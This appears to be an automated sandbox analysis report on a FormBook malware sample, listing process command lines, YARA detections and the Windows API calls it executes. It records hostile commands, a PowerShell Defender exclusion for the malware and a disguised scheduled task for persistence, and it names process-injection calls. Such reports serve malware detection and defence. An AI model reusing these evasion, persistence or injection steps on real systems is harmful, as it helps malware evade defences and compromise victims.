Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\zE1VxVoZ3W.exe"
Imagebase:	0x620000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:39:18
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	10:39:18
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe"
Imagebase:	0x620000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:39:18
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:39:18
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ydRhqlPsLsIczR" /XML "C:\Users\user\AppData\Local\Temp\tmp7D49.tmp"
Imagebase:	0xc40000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	10:39:19
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	10:39:20
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\zE1VxVoZ3W.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\zE1VxVoZ3W.exe"
Imagebase:	0x4e0000
File size:	1'010'176 bytes
MD5 hash:	3AF13FB92C445D73E1CE763D1400D39C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1996556197.0000000001370000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1993276336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1997237441.00000000028D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	10:39:20
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe
Imagebase:	0x540000
File size:	1'010'176 bytes
MD5 hash:	3AF13FB92C445D73E1CE763D1400D39C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 76%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	10:39:22
Start date:	10/01/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff605670000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	10:39:26
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ydRhqlPsLsIczR" /XML "C:\Users\user\AppData\Local\Temp\tmp99F9.tmp"
Imagebase:	0xc40000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	10:39:28
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	10:39:28
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe"
Imagebase:	0x20000
File size:	1'010'176 bytes
MD5 hash:	3AF13FB92C445D73E1CE763D1400D39C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	10:39:28
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe"
Imagebase:	0x420000
File size:	1'010'176 bytes
MD5 hash:	3AF13FB92C445D73E1CE763D1400D39C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	10:39:28
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe"
Imagebase:	0x660000
File size:	1'010'176 bytes
MD5 hash:	3AF13FB92C445D73E1CE763D1400D39C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	10:39:47
Start date:	10/01/2025
Path:	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe"
Imagebase:	0x5a0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	10:39:50
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\winver.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\winver.exe"
Imagebase:	0x4c0000
File size:	57'344 bytes
MD5 hash:	B5471B0FB5402FC318C82C994C6BF84D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.4059783841.0000000004580000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.4057661032.0000000002710000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.4059982269.0000000004620000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	10:40:04
Start date:	10/01/2025
Path:	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe"
Imagebase:	0x5a0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.4059491839.00000000022A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	10:40:16
Start date:	10/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6d20e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	3.6%
Total number of Nodes:	221
Total number of Limit Nodes:	20

Executed Functions

Function 0773A680 Relevance: .5, Instructions: 507COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1658173461.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26537890e9be9ebf0fd3f9a9b61e937670c7ec4156172bbbbcc9e6c5d8c0938c
Instruction ID: ec7afc24d2545ee059c5778352e5935d5daf5a985be4e8302ee54d4995377402
Opcode Fuzzy Hash: 26537890e9be9ebf0fd3f9a9b61e937670c7ec4156172bbbbcc9e6c5d8c0938c
Instruction Fuzzy Hash: C7D1FDB1B013018FEB15DB75C850BAEB7E6AF89640F11886DD18ADB292DB39D842CB51

Function 016B4218 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1625292991.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16b0000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1058d7d5146b3926a4d12869ff0988c3f4606c1a6f332f1bc69f95f193c25544
Instruction ID: 7fd075b6682e521da575ec12ea59bb842aba45a8c7ebfb47605fc6fb7be57dd6
Opcode Fuzzy Hash: 1058d7d5146b3926a4d12869ff0988c3f4606c1a6f332f1bc69f95f193c25544
Instruction Fuzzy Hash: A8519270E01209DFDB08DFA9D8909EEBBF2FF88300F54812AD419AB264DB359946CB54

Function 016B6F92 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1625292991.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16b0000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 659fa2856e26104554da0e3b5e4f66796f2f30936e1beea546bfc2fa13886798
Instruction ID: c8c5ff3312826ef8a7505ece51fbfe32d4115ae4fa8821e6e61a25bed5b81c7f
Opcode Fuzzy Hash: 659fa2856e26104554da0e3b5e4f66796f2f30936e1beea546bfc2fa13886798
Instruction Fuzzy Hash: 89519074E01209CFDB08DFA9D8909EEBBF2BF88300F14816AD419AB264DB359946CF54

Function 0773868E Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1658173461.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0032306bce57db8dfe983d00b6806b3c8c0bcb18aefd10f13f6dbcc8a447132d
Instruction ID: 18b1b5d5cbaa77359e96546e82735c505aa0b79e621592ff01a2b5910f1acf8e
Opcode Fuzzy Hash: 0032306bce57db8dfe983d00b6806b3c8c0bcb18aefd10f13f6dbcc8a447132d
Instruction Fuzzy Hash: 1601E5B4A59229CFDB20CF24C8447ECB7B8AB0B385F1060D5E54EA2252D7749A84CF52

Function 016BD4E8 Relevance: 6.1, APIs: 4, Instructions: 135
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 016BD576
GetCurrentThread.KERNEL32 ref: 016BD5B3
GetCurrentProcess.KERNEL32 ref: 016BD5F0
GetCurrentThreadId.KERNEL32 ref: 016BD649

Memory Dump Source

Source File: 00000000.00000002.1625292991.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16b0000_zE1VxVoZ3W.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 1d21c154e9e0a06fdf8348ef26fe88874359f6f4a97e812e50756f59e828d3cb
Instruction ID: 5d1b268d3dce7c590c3bc6ea131626b43c8a1213ca152d807eb1551848a8e4b6
Opcode Fuzzy Hash: 1d21c154e9e0a06fdf8348ef26fe88874359f6f4a97e812e50756f59e828d3cb
Instruction Fuzzy Hash: 355167B09003498FEB14CFA9D9887EEBFF1AF88308F248459E419AB3A0D7755944CF65

Function 016BD4F8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 016BD576
GetCurrentThread.KERNEL32 ref: 016BD5B3
GetCurrentProcess.KERNEL32 ref: 016BD5F0
GetCurrentThreadId.KERNEL32 ref: 016BD649

Memory Dump Source

Source File: 00000000.00000002.1625292991.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16b0000_zE1VxVoZ3W.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: ed648fba481c760ff55b2b22ecb041a00284ecc80c35fa5461c6260f9c4ba11f
Instruction ID: 60e5661f2a434cca338a4b8d622018901dbdccd43d09b63fbf27bb46b0ad81a3
Opcode Fuzzy Hash: ed648fba481c760ff55b2b22ecb041a00284ecc80c35fa5461c6260f9c4ba11f
Instruction Fuzzy Hash: B45167B09003098FDB14CFAAD988BDEBBF1BF88318F248059E419A7350DB756984CF65

Function 07735365 Relevance: 1.8, APIs: 1, Instructions: 253
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 077355A6

Memory Dump Source

Source File: 00000000.00000002.1658173461.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_zE1VxVoZ3W.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 88905841d8253ffad56157979ce5e080ca7fac7d025ac66ef949b165b892be85
Instruction ID: 70ac08f326a43b865430e5c57c7e48c17d39f6f3cfaab8e0a7c99a36e5a5ce16
Opcode Fuzzy Hash: 88905841d8253ffad56157979ce5e080ca7fac7d025ac66ef949b165b892be85
Instruction Fuzzy Hash: AAA16CB1D0071ACFEB14CFA8C841BEEBBB2BB48354F148569E808A7251D7749991CF91

Function 094D6468 Relevance: 1.7, APIs: 1, Instructions: 246
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1660338925.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_94d0000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acc820ce042deb5dc22ba7a7e01c38c32a9f22f7a09e1f4cb9ea9ff9df0403cf
Instruction ID: 3df7368be26facbd766397a4512252baeb29789a2e4f10a8b846335fccf5092e
Opcode Fuzzy Hash: acc820ce042deb5dc22ba7a7e01c38c32a9f22f7a09e1f4cb9ea9ff9df0403cf
Instruction Fuzzy Hash: 43915F35A002188FCB14EFA8C965AAEB7F2FF89314F254469D405EB361CB35AD41CFA1

Function 07735370 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 077355A6

Memory Dump Source

Source File: 00000000.00000002.1658173461.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_zE1VxVoZ3W.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 80d583b7d3c13ad97e6d7962ee08435851dfd5eb141a3f7edbe476ccd70775dd
Instruction ID: c2ffad40847f8a22f167d6019b82a631107fc06f28a742f1bd6205641ec1b5b1
Opcode Fuzzy Hash: 80d583b7d3c13ad97e6d7962ee08435851dfd5eb141a3f7edbe476ccd70775dd
Instruction Fuzzy Hash: 9D915BB1D0071ACFEB14CF68C841BEEBBB2BB48354F148569E808A7241DB749991CF91

Function 016BAE59 Relevance: 1.7, APIs: 1, Instructions: 217
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 016BB0BE

Memory Dump Source

Source File: 00000000.00000002.1625292991.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16b0000_zE1VxVoZ3W.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 83e3cb3885e6ffcc1c7c4327605d09b92458b845275b5281acb1f07cce0f15f8
Instruction ID: 5d4354bcdc8dc8e64cdeca9ced5b3a70372d5536920816bddfd10a137f9a7061
Opcode Fuzzy Hash: 83e3cb3885e6ffcc1c7c4327605d09b92458b845275b5281acb1f07cce0f15f8
Instruction Fuzzy Hash: E3818AB0A00B458FD725DF69C88079ABBF5FF88204F00892ED49ACBB51D775E885CB91

Function 016B590D Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 016B59C9

Memory Dump Source

Source File: 00000000.00000002.1625292991.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16b0000_zE1VxVoZ3W.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: b357c1c1c49f6edb3e2535a0ef3eeed5ced8bc2ad1beb0b2890e95f20ffe8b37
Instruction ID: 678b0eaebe908a04c496de5fa7cbd9af1d1ba94c07e7687d967841f0cd5b3dce
Opcode Fuzzy Hash: b357c1c1c49f6edb3e2535a0ef3eeed5ced8bc2ad1beb0b2890e95f20ffe8b37
Instruction Fuzzy Hash: 8741CFB0C00759CFDB24DFAAC884BDEBBB5BF89304F24806AD419AB251DB755986CF50

Function 016B44E0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 016B59C9

Memory Dump Source

Source File: 00000000.00000002.1625292991.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16b0000_zE1VxVoZ3W.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 3b99c7fdd9b4e3122aa83e10f653693c9a672cbfeb65a4cc4fd593a696ccbc8a
Instruction ID: 079ed0100a2008c69783e4a05285b6fc2c9b68af905a4fac2d750f43b5855257
Opcode Fuzzy Hash: 3b99c7fdd9b4e3122aa83e10f653693c9a672cbfeb65a4cc4fd593a696ccbc8a
Instruction Fuzzy Hash: 4541B270C00719CBDB24DFAAC8847DEBBF5BF89704F24806AD509AB251DB755946CF50

Function 077350E0 Relevance: 1.6, APIs: 1, Instructions: 77
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07735178

Memory Dump Source

Source File: 00000000.00000002.1658173461.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_zE1VxVoZ3W.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 0b3137ca1a7133628b184a6ea9b48d04cafe6b759b77675ef6d8c86371eaf432
Instruction ID: fe9edb3743dc5e5cea8819c1a1046b7944ed9f7f330567db232169bc2c001b27
Opcode Fuzzy Hash: 0b3137ca1a7133628b184a6ea9b48d04cafe6b759b77675ef6d8c86371eaf432
Instruction Fuzzy Hash: 223148B19003499FDF10CFAAC8847DEBFF5EF49310F10882AE919A7241D7799951CBA5

Function 07734F4B Relevance: 1.6, APIs: 1, Instructions: 70
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07734FCE

Memory Dump Source

Source File: 00000000.00000002.1658173461.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_zE1VxVoZ3W.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 16547fb6847ad16054668448614014906b50d6d12d38bef4185b99a387dcdec1
Instruction ID: de6629df07bffb40ce5ff3320bffff9421d4b3956c20d775c45aa1b5ad55ace6
Opcode Fuzzy Hash: 16547fb6847ad16054668448614014906b50d6d12d38bef4185b99a387dcdec1
Instruction Fuzzy Hash: 93219AB29003498FDB14CFAAC4857EEBBF4EF88354F18842EE419A7241C7789945CFA4

Function 077350E8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07735178

Memory Dump Source

Source File: 00000000.00000002.1658173461.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_zE1VxVoZ3W.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 3fee4d1d491431918d04c12804c64a3e80ff4d00a079420d7b1070743fd78ef4
Instruction ID: 08634828355a8f807e28dc28d392ca851f7b84b84ed974e845065c80d025bb14
Opcode Fuzzy Hash: 3fee4d1d491431918d04c12804c64a3e80ff4d00a079420d7b1070743fd78ef4
Instruction Fuzzy Hash: C22136B19003599FDF10CFAAC885BDEBBF5FF48310F10882AE919A7241D7789950CBA5

Function 077351D0 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07735258

Memory Dump Source

Source File: 00000000.00000002.1658173461.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_zE1VxVoZ3W.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: b12a3aa7336daf46c94ba724ad27f8a81d927208651a4b04fb6dd4f5128edcc8
Instruction ID: 66ed02be1ce600198149dde3a4eaf20996531b47080065cbfefda5c96beaf8e0
Opcode Fuzzy Hash: b12a3aa7336daf46c94ba724ad27f8a81d927208651a4b04fb6dd4f5128edcc8
Instruction Fuzzy Hash: DE2125B18003499FDB10CFAAC880BEEFBF5FF48310F54882AE919A7241C7799511CBA4

Function 07734F50 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07734FCE

Memory Dump Source

Source File: 00000000.00000002.1658173461.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_zE1VxVoZ3W.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: fb349d83254dd390c83c919abda7a903601896c8ad01dfc441aa8e35655fbe1a
Instruction ID: 1001060a1d0774d82b8edac8e5f0e9769364114bc6a7dbf903518dc3ce477aae
Opcode Fuzzy Hash: fb349d83254dd390c83c919abda7a903601896c8ad01dfc441aa8e35655fbe1a
Instruction Fuzzy Hash: 2B215BB1D003098FDB14CFAAC4857EEBBF4EF88314F14842AE419A7241C7789945CFA5

Function 077351D8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07735258

Memory Dump Source

Source File: 00000000.00000002.1658173461.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_zE1VxVoZ3W.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 64952fa2cf0a644d0cea9b93194e8c2e333df3068474db40de1b133333ed4c32
Instruction ID: dd6070f3d3f26c7eac5a58df0fac87f262e406c2173d91138a957a24fae3cdcd
Opcode Fuzzy Hash: 64952fa2cf0a644d0cea9b93194e8c2e333df3068474db40de1b133333ed4c32
Instruction Fuzzy Hash: 0F2139B18003499FDB10CFAAC881BDEFBF5FF48310F50882AE919A7240C7789510CBA4

Function 016BD740 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016BD7C7

Memory Dump Source

Source File: 00000000.00000002.1625292991.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16b0000_zE1VxVoZ3W.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 3048dc8d01f3855006189c7968bbbee5f160eec65a70db72aedad92bb0f6c757
Instruction ID: 5ef07edfd25634072b6cb5189af70c228a4d3a7493795051b44df9e05be620b3
Opcode Fuzzy Hash: 3048dc8d01f3855006189c7968bbbee5f160eec65a70db72aedad92bb0f6c757
Instruction Fuzzy Hash: F421C4B59003489FDB10CFAAD984ADEBFF8EB48314F14841AE918A7350D374A944CF65

Function 016BD738 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016BD7C7

Memory Dump Source

Source File: 00000000.00000002.1625292991.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16b0000_zE1VxVoZ3W.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 3cbe74ecd5834002f71c1f32382665b6816bc3e4ff3fad5f4977f4f2bb13aaa4
Instruction ID: fd58277fd82e47329dacd720fe30fb360e3a897656db8ba5facb577fb1232362
Opcode Fuzzy Hash: 3cbe74ecd5834002f71c1f32382665b6816bc3e4ff3fad5f4977f4f2bb13aaa4
Instruction Fuzzy Hash: E721E2B59003489FDB10CFAAD984AEEBFF4FB48314F14841AE958A7350C378AA41CF65

